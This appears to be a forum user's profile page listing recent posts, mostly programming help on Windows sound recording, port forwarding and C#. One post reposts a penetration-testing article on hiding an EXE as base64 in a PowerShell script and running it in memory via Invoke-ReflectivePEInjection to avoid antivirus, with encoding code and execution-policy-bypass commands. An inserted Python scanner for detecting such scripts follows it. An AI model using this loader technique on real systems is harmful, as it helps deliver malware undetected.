gigiRoman last won the day on March 27

gigiRoman had the most liked content!

Community Reputation

102 Excellent

About gigiRoman

  • Rank
    Registered user
  • Birthday 02/05/77
  1. SoundRecorder for Windows 10

    Here it says how to set it: https://stackoverflow.com/a/17063026/3434918 Note that the bit depth also matters for the clarity of the sound. System parameters: sample rate: 44100, buffer milliseconds: 100, bit depth: 32. Changing these settings will also change the file size. Try it like this. Unfortunately, I have no way to try the code...
  2. SoundRecorder for Windows 10

    Recording quality: I think you have the sample rate set to 8000; try setting it to 44100. Autostop implementation: make a timer that dumps to the file at a time interval of your choosing.
  3. https://www.researchgate.net/publication/272508749_HTTP_Programming_Recipes_for_C_Bots HTTP Programming Recipes for C# Bots
  4. https://mytxt.xyz/python-hacking-the-no-nonsense-bundle-learn-python-programming-and-hacking-within-24-hours/
  5. SoundRecorder for Windows 10

    It is possible that the libraries are no longer compatible. I worked at a company that made voice software, and when the application moved to Win10 the Microsoft API stopped working. So we moved to NAudio: https://github.com/naudio/NAudio You can try its demo projects if it doesn't work for you otherwise. Send a PM if you can't manage.
  6. Source: https://www.google.ro/amp/s/truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/amp/

    Fabio Viggiani, 2 years ago

    As sometimes happens, when you solve a particular problem, you realize that the solution can be generalized to cover more scenarios than the one you had in mind. This is one of those stories.

    I was trying to resolve an issue with creating a pure PowerShell payload as part of a client-side attack. Using PowerShell to run malicious code has many advantages, including:

      • No need to install anything on the target.
      • Very powerful engine underneath (e.g. you can directly invoke .NET code).
      • You can use base64-encoded commands to obfuscate your evil commands, making the attack a little less obvious to spot. This is also a way to avoid escaping all the special characters, especially in advanced attacks involving several steps to deliver the payload.
      • You can use Invoke-Expression to interpret strings as PowerShell commands. From a penetration tester’s perspective, this is very useful to avoid writing complex scripts on disk. For example, you can use PowerShell to download an additional (complex) script, and pipe it directly to Invoke-Expression, which will interpret and execute the downloaded script in memory, within the PowerShell process. This also avoids antivirus detection.

    The payload I wanted to run on the target included fairly complex functionalities. I had those functionalities as part of an EXE file. I didn’t want to drop the binary on the target system since it could potentially trigger an antivirus. I wanted to use PowerShell, but I didn’t want to rewrite the whole thing in PowerShell. So I came up with a solution.

    The objective is to embed a binary into a PowerShell script, and run it from within the script without writing it on disk. This is how the solution works:

    1. Take your binary file and base64-encode it

    You can use the following function:

        function Convert-BinaryToString {
            [CmdletBinding()]
            param (
                [string] $FilePath
            )
            try {
                $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
            }
            catch {
                throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
            }
            if ($ByteArray) {
                $Base64String = [System.Convert]::ToBase64String($ByteArray);
            }
            else {
                throw '$ByteArray is $null.';
            }
            Write-Output -InputObject $Base64String;
        }

    2. Create a new script with the following:

      • The EXE converted to string created in point 1
      • The function Invoke-ReflectivePEInjection (part of the Powersploit project)
      • Convert the string to byte array
      • Call Invoke-ReflectivePEInjection

    So basically your binary is just a string in the PowerShell script. Once decoded as a byte array, the function Invoke-ReflectivePEInjection (part of the Powersploit project) will run it in memory within the PowerShell process.

    The final payload will look something like this:

        # Your base64 encoded binary
        $InputString = '...........'

        function Invoke-ReflectivePEInjection
        {
            ......
            ......
            ......
        }

        # Convert base64 string to byte array
        $PEBytes = [System.Convert]::FromBase64String($InputString)

        # Run EXE in memory
        Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"

    You can now run the script on the target like this:

        powershell -ExecutionPolicy Bypass -File payload.ps1

    Depending on the binary you embedded, you might get the following error:

        PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)

    To fix the issue, simply run the 32 bit PowerShell:

        %windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File payload.ps1

    In the example below, I embedded plink.exe in payload.ps1

    Pretty cool, uh?
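A script built as described above leaves a recognisable artefact for defenders: a long base64 string literal that decodes to a PE image, sitting next to a `FromBase64String` call. The scanner below is an added example, not part of the quoted article or of the Powersploit project; its function names and both sample scripts are constructed for illustration, and it is meant to run over script text such as files on disk or logged script block content.

```python
import base64
import re
import struct

# Quoted string literals made only of base64 characters; short ones are ignored.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{64,}={0,2})['"]""")
# Names that appear in the loader script shown on this page.
LOADER_HINTS = ("FromBase64String", "Invoke-ReflectivePEInjection")


def looks_like_pe(blob: bytes) -> bool:
    """True if blob starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_script(text: str) -> dict:
    """Report embedded PE images and loader hints found in PowerShell script text."""
    embedded = []
    for match in B64_LITERAL.finditer(text):
        try:
            blob = base64.b64decode(match.group(1), validate=True)
        except ValueError:
            continue  # not valid base64 after all (wrong length or padding)
        if looks_like_pe(blob):
            embedded.append({"offset": match.start(1), "decoded_size": len(blob)})
    hints = [h for h in LOADER_HINTS if h.lower() in text.lower()]
    return {"embedded_pe": embedded, "loader_hints": hints,
            "alert": bool(embedded) and bool(hints)}


def constructed_pe_stub() -> bytes:
    """Constructed 0x80-byte header stub (not a runnable program) for the demo."""
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    dos[0x40:0x44] = b"PE\x00\x00"
    return bytes(dos)

# Constructed sample inputs: one loader-shaped script, one harmless image blob.
SAMPLE_HIT = ("$InputString = '%s'\n"
              "$PEBytes = [System.Convert]::FromBase64String($InputString)\n"
              % base64.b64encode(constructed_pe_stub()).decode())
SAMPLE_BENIGN = "$logo = '%s'\n" % base64.b64encode(b"\x89PNG" + bytes(96)).decode()

if __name__ == "__main__":
    print(scan_script(SAMPLE_HIT)["alert"], scan_script(SAMPLE_BENIGN)["alert"])
```
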
  7. SoundRecorder for Windows 10

    Doesn't soundRecorder.exe exist in system32? If it isn't there, try downloading it. I think Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe!App /FILE is related to that new Cortana recorder, and it may be too dumb to be called from the command line.
  8. C/C++ — Manual Dll Injection | Manual Mapping

  9. Help with port forwarding

    You use a proxy (command server). You make another client (client1) that sits on the same machine as the NATed server. Both clients connect to the proxy. When the client makes a request to the proxy, the proxy forwards it to client1, which makes the request on localhost. You follow the same path back for the response. I have done schemes like this over TCP with C# and they worked. The servers were not HTTP, they were raw. I attempted a diagram: https://imgur.com/O4NInNY
  10. Has anyone worked with the RSA algorithm?

    I think RSA is only useful for PKI https://security.stackexchange.com/a/33445
  11. What does Jon Skeet say? Cool topic, I really didn't know: "This happens for example for auto generated properties, the yield keyword, lambda & anonymous functions/delegates, the new async keyword (the one that is introduced in the Async CTP and that will probably be present in C# 5.0)" "you are looking at a class that was automatically generated to implement closure semantics. My handy guide to interpreting the magic names that the C# compiler generates when it has to make something on your behalf is here: Where to learn about VS debugger 'magic names'" Source: https://stackoverflow.com/questions/7357525/empty-before-c-sharp-class-name https://stackoverflow.com/a/2509524
  12. Question about phone tapping

    POLIANDRÍE (polyandry), feminine noun. A form of family organization (found today only among some primitive tribes) in which a woman has several husbands at the same time. [Pron.: -li-an-] – From French polyandrie.
  13. Question about phone tapping

  14. What books are you reading these days?

  15. Help!!

    7500 lei was the fee for the master's program at the Military Technical Academy, for 1.5 years. Lol.